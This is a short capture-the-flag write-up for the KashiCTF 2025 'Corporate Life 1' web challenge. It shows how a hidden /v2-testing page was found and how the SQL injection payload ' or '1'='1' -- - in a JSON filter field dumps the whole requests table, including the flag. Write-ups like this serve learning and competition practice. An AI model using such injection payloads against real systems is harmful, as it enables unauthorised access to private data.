This is the Writeup for the Coprorate Life 1 Web challenge of the Kashi CTF 2025
Description#
The Request Management App is used to view all pending requests for each user. It’s a pretty basic website, though I heard they were working on something new.
Anyway, did you know that one of the disgruntled employees shared some company secrets on the Requests Management App, but it’s status was set denied before I could see it. Please find out what it was and spill the tea!
Notes#
Writeup#
Source code reveals V4 endpoint:
},"/":["static/chunks/pages/index-6413244cd5618b98.js"],
"/_error":["static/chunks/pages/_error-fde50cb7f1ab27e0.js"],
"/v2-testing":["static/chunks/pages/v2-testing-fb612b495bb99203.js"],
sortedPages:["/","/_app","/_error","/v2-testing"]
}
http://34.41.106.173:10742/v2-testing
There appears to be an SQL injection:
{
"filter":"'"
}
Results in the following error message
{
"error":"Internal Server Error: Database communication failed"
}
The simple SQLi payload:
{"filter":"' or '1'='1' -- -"}
Results in the leak of the entire database and then the flag:
{
"employee_name": "peter.johnson",
"request_detail": "Shitty job, I hate working here, I will leak all important information like KashiCTF{REDACTED_FLAG}",
"status": "denied",
"department": "Logistics",
"role": "Supply Chain Manager",
"email": "peter.johnson@corp.com"
}